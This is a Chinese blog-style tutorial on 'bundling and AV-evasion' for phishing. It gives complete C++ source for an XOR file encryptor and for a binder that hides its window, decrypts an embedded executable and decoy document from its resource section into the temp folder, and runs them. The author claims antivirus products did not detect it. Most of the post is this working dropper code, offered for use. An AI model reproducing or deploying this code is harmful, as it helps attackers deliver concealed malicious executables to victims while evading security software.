本文主要是介绍浅谈捆绑免杀技术,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
文章目录
- 前记
- 浅谈原理
- 代码汇总
- 后记
- reference
前记
看到奇安信某篇钓鱼捆绑技术的文章后得到启发,于是开始学习探索
浅谈原理
将exe和pdf或者其他格式的文件写到资源节中,执行捆绑文件的时候动态获取并解密资源节的内容保存到磁盘的tmp目录,最后执行保存到磁盘的文件即可
代码汇总
加密文件
#include<windows.h>
#include <iostream>
using namespace std;
int main(int argc, char* argv[])
{int r = 100;HANDLE file = CreateFileA(argv[1], GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);DWORD64 size = GetFileSize(file, NULL);char* bytes =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size);ReadFile(file, bytes, size, NULL, NULL);HANDLE file2 = CreateFileA("sec.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);LPVOID res = bytes;int b;DWORD64 c = size;srand(r);while (c--) {b = rand() % 255 + 1;//1-255*bytes^= b;bytes++;}if (!WriteFile(file2, res, size, NULL, NULL)) {std::cerr << "Error writing to file" << std::endl;DWORD aaa=GetLastError();return 1;}CloseHandle(file2);CloseHandle(file);return 0;
}
捆绑文件
#include <iostream>
#include <windows.h>int r=100;
using namespace std;
static int num = 0;void getreal(char *dest,char *src, DWORD num)
{int b;srand(r);while (num--) {b = rand() % 255 + 1;//1-255*dest++ = *src++^b;}
}
void HideWindow() {HWND hwnd = GetForegroundWindow();if (hwnd) {ShowWindow(hwnd, SW_HIDE);}
}
void EnumTypesFunc(HMODULE hModule, LPTSTR lpType, LPTSTR lParam) {num++;DWORD dwNum = WideCharToMultiByte(CP_OEMCP, NULL, lpType, -1, NULL, 0, NULL, FALSE);char* fileType =new char[dwNum];WideCharToMultiByte(CP_OEMCP, NULL, lpType, -1, fileType, dwNum, NULL, FALSE);CHAR PathFileName[MAX_PATH] = { 0 };CHAR FileName[MAX_PATH] = { 0 };HRSRC Resource = FindResourceA(NULL, MAKEINTRESOURCEA(100 + num), fileType);HGLOBAL ResourceGlobal = LoadResource(NULL, Resource);DWORD FileSize = SizeofResource(NULL, Resource);LPVOID PFILE = LockResource(ResourceGlobal);GetModuleFileNameA(NULL, PathFileName, MAX_PATH);strcpy_s(FileName, strrchr(PathFileName, '\\') + 1);string FileNameFinal = FileName;FileNameFinal.replace(FileNameFinal.rfind('.'), 4, "." + string(fileType));CHAR czTempPath[MAX_PATH] = { 0 };GetTempPathA(MAX_PATH, czTempPath);FileNameFinal = czTempPath + FileNameFinal;strcpy_s(FileName, FileNameFinal.c_str());HANDLE FILE = CreateFileA(FileName, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, 0, NULL);DWORD dwSize;char *real= new char[FileSize];getreal(real,(char *)PFILE,FileSize);WriteFile(FILE, real, FileSize, &dwSize, NULL);CloseHandle(FILE);Sleep(500);SHELLEXECUTEINFOA shellexecute = { 0 };shellexecute.cbSize = sizeof(shellexecute);shellexecute.lpFile = FileName;shellexecute.nShow = SW_SHOW;ShellExecuteExA(&shellexecute);
}int main(int argc, char* argv[])
{HideWindow();EnumResourceTypes(NULL,(ENUMRESTYPEPROC)EnumTypesFunc,0);
}
因为对资源节内容进行了加密,所以这里资源节里完全没有PE特征
后记
由于解析文件后缀依靠填写的文件真实格式,因此可能被杀软检测到资源节的exe关键字,建议宏定义或者加密处理(懒得改代码了)。经过测试杀软均不拦截且正常运行,当然如果exe文件落地后报毒则和捆绑本身操作无关
reference
https://forum.butian.net/share/1778
https://github.com/testxxxzzz/Bundler-bypass/blob/main/Bundler_C/main.cpp
这篇关于浅谈捆绑免杀技术的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
